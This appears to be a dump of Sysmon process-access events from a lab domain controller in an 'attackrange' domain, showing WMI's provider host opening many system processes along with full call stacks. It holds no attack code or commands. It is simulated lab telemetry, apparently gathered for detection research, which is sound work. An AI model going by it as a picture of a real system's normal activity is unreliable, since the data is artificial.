 10341000x800000000000000023642Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023641Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023640Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023639Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023638Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023637Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023636Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023635Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023634Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023633Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023632Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023631Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023630Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023629Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023628Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023627Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023626Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023625Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023624Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023623Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023622Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 